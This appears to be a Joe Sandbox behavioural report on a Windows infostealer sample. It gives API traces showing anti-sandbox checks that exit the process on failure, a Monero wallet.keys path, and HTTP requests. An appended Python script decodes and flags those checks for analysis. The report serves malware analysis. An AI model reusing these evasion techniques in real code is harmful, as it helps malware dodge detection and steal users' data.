                                  control_flow_graph 1301 6c19f0-6c1a1d call 6cade0 StrCmpCA 1304 6c1a1f-6c1a21 ExitProcess 1301->1304 1305 6c1a27-6c1a41 call 6cade0 1301->1305 1309 6c1a44-6c1a48 1305->1309 1310 6c1a4e-6c1a61 1309->1310 1311 6c1c12-6c1c1d call 6cab10 1309->1311 1312 6c1bee-6c1c0d 1310->1312 1313 6c1a67-6c1a6a 1310->1313 1312->1309 1315 6c1aad-6c1abe StrCmpCA 1313->1315 1316 6c1acf-6c1ae0 StrCmpCA 1313->1316 1317 6c1a85-6c1a94 call 6cab30 1313->1317 1318 6c1bc0-6c1bd1 StrCmpCA 1313->1318 1319 6c1b41-6c1b52 StrCmpCA 1313->1319 1320 6c1ba1-6c1bb2 StrCmpCA 1313->1320 1321 6c1b82-6c1b93 StrCmpCA 1313->1321 1322 6c1b63-6c1b74 StrCmpCA 1313->1322 1323 6c1afd-6c1b0e StrCmpCA 1313->1323 1324 6c1b1f-6c1b30 StrCmpCA 1313->1324 1325 6c1bdf-6c1be9 call 6cab30 1313->1325 1326 6c1a99-6c1aa8 call 6cab30 1313->1326 1327 6c1a71-6c1a80 call 6cab30 1313->1327 1350 6c1aca 1315->1350 1351 6c1ac0-6c1ac3 1315->1351 1329 6c1aee-6c1af1 1316->1329 1330 6c1ae2-6c1aec 1316->1330 1317->1312 1344 6c1bdd 1318->1344 1345 6c1bd3-6c1bd6 1318->1345 1335 6c1b5e 1319->1335 1336 6c1b54-6c1b57 1319->1336 1341 6c1bbe 1320->1341 1342 6c1bb4-6c1bb7 1320->1342 1339 6c1b9f 1321->1339 1340 6c1b95-6c1b98 1321->1340 1337 6c1b76-6c1b79 1322->1337 1338 6c1b80 1322->1338 1331 6c1b1a 1323->1331 1332 6c1b10-6c1b13 1323->1332 1333 6c1b3c 1324->1333 1334 6c1b32-6c1b35 1324->1334 1325->1312 1326->1312 1327->1312 1352 6c1af8 1329->1352 1330->1352 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1338 1338->1312 1339->1312 1340->1339 1341->1312 1342->1341 1344->1312 1345->1344 1350->1312 1351->1350 1352->1312
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 006C1A15
                                  • ExitProcess.KERNEL32 ref: 006C1A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 73bd5f095d4cbe24f579068ef3c125f9be90c8349cefdb1d5f402817b9fc1c9e
                                  • Instruction ID: 7c246cb936ac00bfc7d44a7c23cd81f98e2925f8c4f6106dddc134cb197ed4da
                                  • Opcode Fuzzy Hash: 73bd5f095d4cbe24f579068ef3c125f9be90c8349cefdb1d5f402817b9fc1c9e
                                  • Instruction Fuzzy Hash: 8951D474A08209ABDB04DFD4D954FBEB7BAEF46704F20408DE412AB351E774EA41DBA1

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472320), ref: 006C9BF1
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472350), ref: 006C9C0A
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472380), ref: 006C9C22
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014724D0), ref: 006C9C3A
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472398), ref: 006C9C53
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014791D8), ref: 006C9C6B
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465E50), ref: 006C9C83
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465BF0), ref: 006C9C9C
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723B0), ref: 006C9CB4
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723C8), ref: 006C9CCC
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472500), ref: 006C9CE5
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723E0), ref: 006C9CFD
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465E30), ref: 006C9D15
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472218), ref: 006C9D2E
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006B11D0: ExitProcess.KERNEL32 ref: 006B1211
                                    • Part of subcall function 006B1160: GetSystemInfo.KERNEL32(?), ref: 006B116A
                                    • Part of subcall function 006B1160: ExitProcess.KERNEL32 ref: 006B117E
                                    • Part of subcall function 006B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006B112B
                                    • Part of subcall function 006B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 006B1132
                                    • Part of subcall function 006B1110: ExitProcess.KERNEL32 ref: 006B1143
                                    • Part of subcall function 006B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006B123E
                                    • Part of subcall function 006B1220: ExitProcess.KERNEL32 ref: 006B1294
                                    • Part of subcall function 006C6A10: GetUserDefaultLangID.KERNEL32 ref: 006C6A14
                                    • Part of subcall function 006B1190: ExitProcess.KERNEL32 ref: 006B11C6
                                    • Part of subcall function 006C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                    • Part of subcall function 006C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                    • Part of subcall function 006C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                    • Part of subcall function 006C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                    • Part of subcall function 006C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                    • Part of subcall function 006C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006C6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 006C6D99
                                  • Sleep.KERNEL32(00001770), ref: 006C6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6DBA
                                  • ExitProcess.KERNEL32 ref: 006C6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 004f8296652f6a7b91e14e512e65b996f540700e87a62005f9a9590c02fed05b
                                  • Instruction ID: 1411085e785eb4418f16085af96c6c0d050a41097ddccaff09de6ffe20a085ad
                                  • Opcode Fuzzy Hash: 004f8296652f6a7b91e14e512e65b996f540700e87a62005f9a9590c02fed05b
                                  • Instruction Fuzzy Hash: 4431FC71A18208AACB84F7E0DC66FFE737BEF04704F50091CF11266292DF70A945976A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 6c6d93 1437 6c6daa 1436->1437 1439 6c6dac-6c6dc2 call 6c6bc0 call 6c5d60 CloseHandle ExitProcess 1437->1439 1440 6c6d5a-6c6d77 call 6cade0 OpenEventA 1437->1440 1446 6c6d79-6c6d91 call 6cade0 CreateEventA 1440->1446 1447 6c6d95-6c6da4 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006C6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 006C6D99
                                  • Sleep.KERNEL32(00001770), ref: 006C6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6DBA
                                  • ExitProcess.KERNEL32 ref: 006C6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 01f2e5108c593368e8f5bd3548ee0ee6cfa60916a10f3ebafd54072cd8c1dc42
                                  • Instruction ID: dd1019aa852134c796c53ab8c49bdf966a5eb37881e6db7695987714aa30ecf5
                                  • Opcode Fuzzy Hash: 01f2e5108c593368e8f5bd3548ee0ee6cfa60916a10f3ebafd54072cd8c1dc42
                                  • Instruction Fuzzy Hash: DAF03A70A4C209ABEB40ABE0DC4AFBDB276EF04B05F20051DB513A5291CBB0B501DB69
                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: f84f05e08c1a7a15203c7f962ce7680a4a3e4ee53e48a29cc5d6a3508549992d
                                  • Instruction ID: d3128b6668e8f61b8770ea9243c96f76addf160a360cfc34c41d258f429b3083
                                  • Opcode Fuzzy Hash: f84f05e08c1a7a15203c7f962ce7680a4a3e4ee53e48a29cc5d6a3508549992d
                                  • Instruction Fuzzy Hash: 82213EB1D00209ABDF14DFA4E849BDEBB75FF45320F108629F915A7280EB706A05CB91
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B62D0: InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                    • Part of subcall function 006B62D0: StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                    • Part of subcall function 006B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                    • Part of subcall function 006B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                    • Part of subcall function 006B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                    • Part of subcall function 006B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5478
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 5726bf021459e2179658486af86ee34143cc7ee1e8fc97f3492ef8b06dd26ef4
                                  • Instruction ID: 148fd3502a521e80abc9d09f566a4359ef0c1323932a4a63fbd76c16d4aa6ff0
                                  • Opcode Fuzzy Hash: 5726bf021459e2179658486af86ee34143cc7ee1e8fc97f3492ef8b06dd26ef4
                                  • Instruction Fuzzy Hash: 6311F87090000CAACB54FBE4D9A2FFD732AEF50344F80455CA91B5A592EB30AB44CA99

                                   Control-flow Graph (rendered image not extracted; the Executed / Not Executed colouring of the legend is lost). Basic blocks recovered from the graph text, as node id: address range, notable calls -> successor nodes:
                                   • 1493: 6b1220-6b1247, call 6c8b40, GlobalMemoryStatusEx -> 1496, 1497
                                   • 1496: 6b1249-6b1271, call 6cdd30 (x2) -> 1499
                                   • 1497: 6b1273-6b127a -> 1499
                                   • 1499: 6b1281-6b1285 -> 1501, 1502
                                   • 1501: 6b129a-6b129d
                                   • 1502: 6b1287 -> 1504, 1505
                                   • 1504: 6b1289-6b1290 -> 1501, 1505
                                   • 1505: 6b1292-6b1294, ExitProcess
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006B123E
                                  • ExitProcess.KERNEL32 ref: 006B1294
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: ca127862c7835be357928fb9b9ac7cb52b372bfe7dae8dbb2f8b55b41aac58f4
                                  • Instruction ID: 6d889fc0a4a94e064026ff3a694c1557466cad29bb5568e500cad31e34cd4e76
                                  • Opcode Fuzzy Hash: ca127862c7835be357928fb9b9ac7cb52b372bfe7dae8dbb2f8b55b41aac58f4
                                  • Instruction Fuzzy Hash: 62014BF0D44308FAEB10DFE0CC5ABEEBB79AF14705F608459E605BA2C1C674AA818759
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 028d4e729a657117ca7011353d8839bf485116ac975238b0c86bef5336f37a81
                                  • Instruction ID: cbe4c596145261267150ddaf697d56035c687ec620c8a5d377501cfa78bdb480
                                  • Opcode Fuzzy Hash: 028d4e729a657117ca7011353d8839bf485116ac975238b0c86bef5336f37a81
                                  • Instruction Fuzzy Hash: 980181B1A08249ABC700CFD8DD85FAEFBB8FB44711F20022AF515E2380D7B45A008BA1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006B112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 006B1132
                                  • ExitProcess.KERNEL32 ref: 006B1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 8c95c3f9b3d74f51f90481d62f90d69ed55034920140f44d8453f4b4b7c4d11d
                                  • Instruction ID: 51356e4cfae52c92d245ac99bf8a15936193afaf5b83561b3a63916a643b6387
                                  • Opcode Fuzzy Hash: 8c95c3f9b3d74f51f90481d62f90d69ed55034920140f44d8453f4b4b7c4d11d
                                  • Instruction Fuzzy Hash: E0E0867095D308FBE7106BD09C0EF4CB6689B04B05F200044F7087A2D0C6B465405B58
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006B10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006B10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: fc66f40aeec5080551a979d3f808f543d58442a673b5a065462425488bbcd3a6
                                  • Instruction ID: 6d6127202474c52242360aafb3fb03293e9fdb66f263618dcc2fb18a22957185
                                  • Opcode Fuzzy Hash: fc66f40aeec5080551a979d3f808f543d58442a673b5a065462425488bbcd3a6
                                  • Instruction Fuzzy Hash: C8F0E2B1645208BBE714AAA4AC59FEEB798E705B14F300448F500E7380D9719E009BA4
                                  APIs
                                    • Part of subcall function 006C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                    • Part of subcall function 006C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                    • Part of subcall function 006C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                    • Part of subcall function 006C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                    • Part of subcall function 006C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                    • Part of subcall function 006C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                  • ExitProcess.KERNEL32 ref: 006B11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: eace6a41d17c3776598335c9462b902be2173b0f621e43f42b45987b4eedd545
                                  • Instruction ID: b2d3ca638c330c086ffa4cac9ea92997ebafe634bb6e18bd01bbfcd5f069d485
                                  • Opcode Fuzzy Hash: eace6a41d17c3776598335c9462b902be2173b0f621e43f42b45987b4eedd545
                                  • Instruction Fuzzy Hash: DCE0ECB691820566CA5077F56C16F6A328E9B1520AF00082CFA048A202E925E8405769
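The functions listed above (GlobalMemoryStatusEx then ExitProcess; GetCurrentProcess, VirtualAllocExNuma then ExitProcess; VirtualAlloc of 0x17C841C0 bytes then VirtualFree; GetComputerNameA and GetUserNameA then ExitProcess) are the sample's pre-execution environment checks: each probes the machine and, where ExitProcess is listed, stops the process when the probe fails. Joe Sandbox prints the dwords on the stack at each call site rather than parsed parameters, so the five values on the GetCurrentProcess line are the already-pushed VirtualAllocExNuma arguments of the call that follows it. The Python below is an added example, not part of the report or of the sample: it parses those API lines (copied from the report and embedded inline), decodes the Windows SDK constants, and marks which functions pair a probe with ExitProcess. The probe list and the fail-closed reading of the call sequences are the editor's interpretation.

```python
"""Decode the per-function API lines from this report and flag the
environment probes that end in ExitProcess."""
import re

# Windows SDK constants (winnt.h / sysinfoapi.h).
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
SIZEOF_MEMORYSTATUSEX = 0x40

# APIs the sample uses to probe the machine before deciding whether to run
# (editor's reading of the report; extend as further functions are reviewed).
PROBES = {"GlobalMemoryStatusEx", "VirtualAllocExNuma", "VirtualAlloc",
          "GetComputerNameA", "GetUserNameA"}

# API lines copied from the report above, one inner list per function.
FUNCTIONS = [
    ["GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006B123E",
     "ExitProcess.KERNEL32 ref: 006B1294"],
    ["GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006B112B",
     "VirtualAllocExNuma.KERNEL32(00000000), ref: 006B1132",
     "ExitProcess.KERNEL32 ref: 006B1143"],
    ["VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006B10B3",
     "VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006B10F7"],
    ["GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF",
     "GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F",
     "ExitProcess.KERNEL32 ref: 006B11C6"],
]

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")


def parse_line(line):
    """Return (api, module, args, ref); '?' (unresolved dword) becomes None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        raise ValueError(f"unrecognised report line: {line!r}")
    args = []
    if m.group("args"):
        args = [None if a == "?" else int(a, 16) for a in m.group("args").split(",")]
    return m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)


def flag_names(value, table):
    """Render a bit mask as OR-ed constant names, falling back to hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    return "|".join(names) if names else hex(value)


def decode_args(api, args):
    """Interpret the arguments that matter for the evasion checks."""
    if api in ("VirtualAlloc", "VirtualFree") and len(args) >= 3:
        out = {"api": api, "size": args[1], "type": flag_names(args[2], ALLOC_TYPES)}
        if api == "VirtualAlloc" and len(args) >= 4:
            out["protect"] = PROTECT.get(args[3], hex(args[3]))
        return out
    if api == "GlobalMemoryStatusEx" and args and args[0] == SIZEOF_MEMORYSTATUSEX:
        return {"api": api, "dwLength": args[0]}
    if api == "GetCurrentProcess" and len(args) >= 5:
        # GetCurrentProcess takes no arguments: the stack dwords are the pending
        # VirtualAllocExNuma(lpAddress, dwSize, flAllocationType, flProtect,
        # nndPreferred) arguments of the call that follows it.
        return {"api": "VirtualAllocExNuma", "size": args[1],
                "type": flag_names(args[2], ALLOC_TYPES),
                "protect": PROTECT.get(args[3], hex(args[3]))}
    return None


def analyse(functions):
    """One result per function: APIs, decoded arguments, and whether a probe
    is paired with ExitProcess (the fail-closed pattern that stops execution)."""
    results = []
    for lines in functions:
        calls = [parse_line(line) for line in lines]
        apis = [api for api, _, _, _ in calls]
        decoded = [d for api, _, args, _ in calls if (d := decode_args(api, args))]
        probes = [api for api in apis if api in PROBES]
        results.append({"ref": calls[0][3], "apis": apis, "decoded": decoded,
                        "probes": probes,
                        "fail_closed": bool(probes) and "ExitProcess" in apis})
    return results


if __name__ == "__main__":
    for r in analyse(FUNCTIONS):
        verdict = "exits on failure" if r["fail_closed"] else "no ExitProcess in this function"
        print(f"{r['ref']:#08x}: {', '.join(r['apis'])} -> {verdict}")
        for d in r["decoded"]:
            print("    ", d)
```

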